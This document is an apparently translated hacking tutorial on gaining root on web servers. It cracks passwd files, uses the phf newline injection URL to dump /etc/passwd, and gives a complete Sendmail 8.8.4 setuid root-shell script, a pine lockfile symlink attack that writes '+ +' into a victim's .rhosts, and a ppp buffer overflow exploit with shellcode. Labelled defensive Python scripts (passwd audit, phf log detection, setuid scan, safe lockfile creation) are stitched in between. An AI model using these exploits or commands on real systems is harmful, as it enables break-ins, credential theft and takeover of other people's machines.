Many of you are probably already UNIX hackers (I'm a newbie myself, just pretending to know), but if you usually hack from Windows this is worth a try. The methodology (or terminology, or anatomy, or whatever you want to call it), in short:
<span class="fullpost">
1. Getting the password via FTP
2. PHF Technique
3. Telnet and Exploits
OK
Obtain Password
The easiest way to gain root access to a web server is through its FTP access. First you must understand the contents of the password file.
root:User:d7Bdg:1n2HG2:1127:20:Superuser
AkedaBagus:p5Y(h0tiC:1229:20:Akeda Bagus,:/usr/people/akedabagus:/bin/csh
MTong:EUyd5XAAtv2dA:1129:20:altered Tong:/usr/people/mtong:/bin/csh
This is an example of a password file with encrypted passwords in it. Here is the interesting part:
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
Here is another example of a password file with a small difference: it is what is known as shadowed. Yup, this file is shadowed. A shadowed file means you can never view or copy the encrypted passwords from it. Example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
A shadowed file has an "x" in place of the password, or sometimes it is masked with *.
Now that you've seen a few password files, hopefully you can recognise one easily. Next, how to crack it.
Cracking passwords is not as hard as you imagine, even though the file format differs from system to system. The first step is to download or copy the file. The next step is to find a password cracker and a dictionary maker (pick ones that fit the file type you have). Where to find them? Hmm ... get used to checking search engines like Google first. Or try astalavista, a search engine for hacking tools. For reference, the author has only used cracker tools like Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Then the dictionary maker or dictionary file ... When we (we..? you do it yourself) start a cracking program, it will ask for the password file. That's where the dictionary maker comes in. You can download one from the hacker sites scattered around. A dictionary maker builds combinations from the character sets we choose (ASCII, uppercase, lowercase and numbers). Then start cracking according to the instructions that come with the tool.
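From the defender's side, the quickest check is whether the file above gives anything away before anyone reaches for a cracker. This is an added audit script (not part of the original post) that parses passwd lines; the sample is built from the page's own entries with the spacing artifacts removed, and note that the page's smtp entry really does carry UID 0.

```python
from dataclasses import dataclass
from typing import List

# Constructed sample: the page's entries, spacing artifacts removed, plus
# one unshadowed line from the first listing. smtp has UID 0 on the page.
SAMPLE_PASSWD = """\
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
smtp:x:0:0:mail daemon user:/:
MTong:EUyd5XAAtv2dA:1129:20:altered Tong:/usr/people/mtong:/bin/csh
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
"""

# Password-field values meaning "hash lives in /etc/shadow" or "locked"
SHADOW_MARKERS = {"x", "*", "!", "!!", "*LK*", "*NP*"}


@dataclass
class Finding:
    user: str
    issue: str


def audit_passwd(text: str) -> List[Finding]:
    """Flag the three things a reader of /etc/passwd hopes to find: a hash
    in the clear (file not shadowed), an empty password field, and a
    second UID-0 account hiding under a non-root name."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(f"line {lineno}", f"malformed entry, {len(fields)} fields"))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append(Finding(user, "empty password field"))
        elif pw not in SHADOW_MARKERS:
            findings.append(Finding(user, "password hash exposed (file not shadowed)"))
        if uid == "0" and user != "root":
            findings.append(Finding(user, "non-root account with UID 0"))
    return findings


def is_shadowed(text: str) -> bool:
    """True when no entry carries a hash in the clear."""
    return not any("hash exposed" in f.issue for f in audit_passwd(text))
```

Run it over a real /etc/passwd and every "hash exposed" line is a candidate for exactly the cracking described above; a second UID-0 entry is a sign someone has already been there.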
PHF Technique
Most people already know this technique, and most servers have already found and fixed this bug. But there's no harm in including it as a reference.
The phf technique is the easiest way (says the know-it-all newbie ... sorry) to get the password file. Just open the browser and type:
http://nama_webpage/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Replace nama_webpage with the domain. So if you're trying to get the password file from www.akeda.com, type:
http://www.akeda.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
That's it! Relax and copy the file (if it still works for you ... well).
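What makes that URL work is the %0a: phf's shell-escaping routine missed the newline, so everything after it ran as a second command. Here is an added detection script (not from the original post) that finds such requests in web server access logs; the log lines are constructed, with the first one copying the request shape shown above.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Common Log Format lines. Request 1 is the page's URL shape;
# client addresses and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Aug/1997:19:05:01 -0500] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1270
198.51.100.2 - - [26/Aug/1997:19:05:09 -0500] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512
198.51.100.9 - - [26/Aug/1997:19:06:30 -0500] "GET /index.html HTTP/1.0" 200 2048
203.0.113.7 - - [26/Aug/1997:19:07:44 -0500] "GET /cgi-bin/phf?Qname=%0D%0Aid HTTP/1.0" 404 210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def classify_phf(target: str) -> Optional[str]:
    """'injection' if a phf request carries a CR or LF in any parameter
    (the byte phf failed to strip, which let the shell start a second
    command), 'probe' for any other phf request, None for non-phf URLs."""
    parts = urlsplit(target)
    if parts.path.rstrip("/").split("/")[-1] != "phf":
        return None
    # parse_qsl percent-decodes, so %0a / %0D%0A become real newlines here
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        if "\n" in value or "\r" in value:
            return "injection"
    return "probe"


def scan_log(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (client, status, verdict, decoded request) for every phf hit.
    A 200 next to 'injection' means the server most likely executed it."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        verdict = classify_phf(m["target"])
        if verdict is not None:
            hits.append((m["ip"], m["status"], verdict, unquote(m["target"])))
    return hits
```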
Telnet and Exploits
Actually this is the best way (I think) to hack web pages, but a bit harder than the ftp or phf tricks. Before setting up an exploit, you must have telnet access to the machine. An exploit takes advantage of an error or bug in the system, and generally serves to gain root access. There are many kinds of exploits scattered across the internet.
The exploit known as the Sendmail v.8.8.4 exploit creates a suid program /tmp/x, which is a root shell. Set it up like this:
cat <<_EOF_ > /tmp/x.c
#define RUN "/bin/ksh"
#include <stdio.h>
int main()
{
   execl(RUN, RUN, NULL);
}
_EOF_
#
cat <<_EOF_ > /tmp/spawnfish.c
int main()
{
   execl("/usr/lib/sendmail", "/tmp/smtpd", 0);
}
_EOF_
#
cat <<_EOF_ > /tmp/smtpd.c
int main()
{
   setuid(0); setgid(0);
   system("chown root /tmp/x; chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax | grep /tmp/smtpd | grep -v grep | sed s/"[ ]*"// | cut -d " " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ]; then
   echo "Leet..."
   /tmp/x
fi
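The exploit's own last step is the detection signature: a root-owned file with mode 4755 sitting in /tmp. This added scanner (not part of the original post) does the same `[ -u /tmp/x ]` check over whole directory trees; the demo builds a constructed scratch directory rather than touching the real /tmp.

```python
import os
import stat
import tempfile
from typing import Iterable, List, Tuple


def find_setuid_files(roots: Iterable[str]) -> List[Tuple[str, int, int]]:
    """Walk each root without following symlinks and return
    (path, permission bits, owner uid) for every regular file with the
    setuid or setgid bit set. Owner uid 0 under /tmp or /var/tmp is the
    case the exploit above leaves behind."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: a planted link must not redirect us
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    hits.append((path, stat.S_IMODE(st.st_mode), st.st_uid))
    return sorted(hits)


def demo() -> List[Tuple[str, int]]:
    """Constructed scenario: a 4755 file named x beside a plain 0755
    helper, i.e. the state the script's final test looks for."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in (("x", 0o4755), ("spawnfish", 0o755)):
            path = os.path.join(tmp, name)
            with open(path, "wb") as fh:
                fh.write(b"#!/bin/sh\n")
            os.chmod(path, mode)
        return [(os.path.basename(p), m) for p, m, _uid in find_setuid_files([tmp])]
```

Mounting /tmp with nosuid stops such a binary from ever running with its owner's privileges, which is the standing mitigation; the scan is for finding what was already planted.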
Now for other exploits. I'll explain the pine exploit on Linux. Look at the process table with ps to see which users are running PINE, then ls /tmp/ to get the lockfile name for each user. Watch the process table again: whenever a user exits PINE or runs out of unread messages in their inbox, PINE effectively removes that user's lockfile.
Make a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts (as a generic example) and PINE will create ~hamors/.rhosts as a mode 666 file with PINE's process id as its contents. Or, more simply, echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
* Here is an excerpt from Sean B. Hamor ... In this example hamors is the victim, while catluvr is the attacker.
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
-rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
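The whole pine trick rests on one programming mistake: creating a lockfile in a shared directory with a call that follows symlinks, then loosening its mode. This added example (not from the original post or from PINE's source) replays the transcript in a constructed scratch directory, with the vulnerable create next to the hardened O_EXCL|O_NOFOLLOW version; file names 'rhosts' and '.302.f5a4' are stand-ins for ~hamors/.rhosts and the lockfile.

```python
import os
import tempfile
from typing import Dict


def create_lockfile_unsafe(path: str, pid: int) -> None:
    """The behaviour the transcript exploits: open-or-truncate, then loosen
    the mode. Both calls follow a symlink, so a link planted at `path` by
    another user becomes a write to, and a chmod 666 of, the link target."""
    with open(path, "w") as fh:
        fh.write(f"{pid}\n")
    os.chmod(path, 0o666)


def create_lockfile_safe(path: str, pid: int) -> None:
    """Hardened: O_EXCL refuses any existing name (a dangling symlink too),
    O_NOFOLLOW refuses to traverse one, and the mode stays owner-only.
    A planted link now makes the call fail loudly instead of silently."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(f"{pid}\n")


def run_demo() -> Dict[str, object]:
    """Constructed replay: attacker plants the link, victim's program
    creates its lockfile, first the unsafe way, then the safe way."""
    with tempfile.TemporaryDirectory() as tmp:
        rhosts = os.path.join(tmp, "rhosts")
        lock = os.path.join(tmp, ".302.f5a4")
        with open(rhosts, "w"):
            pass
        os.chmod(rhosts, 0o600)
        os.symlink(rhosts, lock)            # the attacker's ln -s
        create_lockfile_unsafe(lock, 1756)  # victim starts pine (pid 1756)
        with open(rhosts) as fh:
            hijacked = fh.read().strip()
        mode = oct(os.stat(rhosts).st_mode & 0o777)
        os.remove(lock)
        os.symlink(rhosts, lock)            # same attack against the safe version
        try:
            create_lockfile_safe(lock, 1756)
            blocked = False
        except OSError:
            blocked = True
        return {"unsafe_wrote_target": hijacked == "1756",
                "target_mode_after_unsafe": mode,
                "safe_refused_symlink": blocked}
```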
The last one I'll tell you about is the script for the ppp vulnerability exploit. Fiddle with the numbers if it doesn't work. Set it up like this:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFER_SIZE 156   /* size of the buffer to overflow */
#define OFFSET -290       /* number of bytes to jump after the start of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }
int main(int argc, char *argv[])
{
   char *buf = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   char execshell[] =
   "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"  /* 16 bytes */
   "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"  /* 16 bytes */
   "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"   /* 20 bytes */
   "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";     /* 15 bytes, 57 total */
   int i, j;
   buf = malloc(4096);
   /* fill start of buffer with nops */
   i = BUFFER_SIZE - strlen(execshell);
   memset(buf, 0x90, i);
   ptr = buf + i;
   /* place exploit code into the buffer */
   for (i = 0; i < strlen(execshell); i++)
      *ptr++ = execshell[i];
   addr_ptr = (long *)ptr;
   for (i = 0; i < (104 / 4); i++)
      *addr_ptr++ = get_esp() + OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   setenv("HOME", buf, 1);
   execl("/usr/sbin/ppp", "ppp", NULL);
}
After obtaining root access, you should change the password before deleting or changing anything. To change it, log in via telnet to your new account. Type passwd, and it will ask you for the new password to change to. </span>